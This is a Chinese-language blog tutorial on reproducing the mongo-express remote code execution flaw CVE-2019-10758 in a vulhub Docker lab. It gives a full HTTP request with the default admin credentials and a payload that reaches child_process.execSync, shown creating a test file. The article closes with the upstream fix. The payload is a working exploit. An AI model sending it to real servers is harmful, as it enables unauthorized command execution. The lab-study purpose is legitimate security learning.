这篇文章将为大家详细讲解有关如何进行MongoDB mongo-express远程代码执行,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。
此软件包的受影响版本容易受到使用toBSON方法的端点通过远程执行代码(RCE)攻击的攻击。 在非安全环境中滥用vm依赖关系来执行exec命令。 默认用户名是admin,密码是pass。
远程代码执行
高
CVE-2019-10758
mongo-express,版本0.54.0及更低版本
mongo-express 0.54.0或更高版本。
这个漏洞环境感觉vulhub的就可以满足,所以选择搭建vulhub的环境
vulhub下载
git clone https://github.com.cnpmjs.org/vulhub/vulhub
这里还有个小福利,有没有觉得经常git clone的时候特别慢?几K、十几K的下载?
为了解决这个问题,尝试了好多方法,总结了一个最有效的方法
git clone的时候在把https://github.com换成: https://github.com.cnpmjs.org/
这是一个国内的github镜像站,下载速度..怎么说呢,起飞!
安装docker(我之前安装过)
安装docker-compose
pip install docker-compose
启用docker,拉取镜像,启动环境
PS:这就又要说一个福利了,docker pull的时候有没有感觉很慢?放着阿里这么大的靠山得用起来呀
https://cr.console.aliyun.com/#/accelerator
登录阿里云进去,左下角有个docker镜像加速,按步骤来,然后...起飞!!
(都是一个坑一个坑摸出来的...)
至此环境搭建成功!
环境启动后,访问http://192.168.192.128:8081即可查看到Web页面。
攻击复现:
直接发送如下数据包,即可执行代码
POST /checkValid HTTP/1.1 Host: your-ip Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Authorization: Basic YWRtaW46cGFzcw== Content-Type: application/x-www-form-urlencoded Content-Length: 124 document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")
Poc目标:在/tcp下创建success文件
发送数据包后访问 http://localhost:8081
查看是否创建成功:
docker-compose exec web ls /tmp
成功创建uccess文件,都到这一步了,还能做什么自由发挥~
ps:此文章仅用于交流学习~
https://github.com/mongo-express/mongo-express/commit/d8c9bda46a204ecba1d35558452685cd0674e6f2
在0.54.0中将bson.js中的vm依赖删除,改用mongo-query-parser
关于如何进行MongoDB mongo-express远程代码执行就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。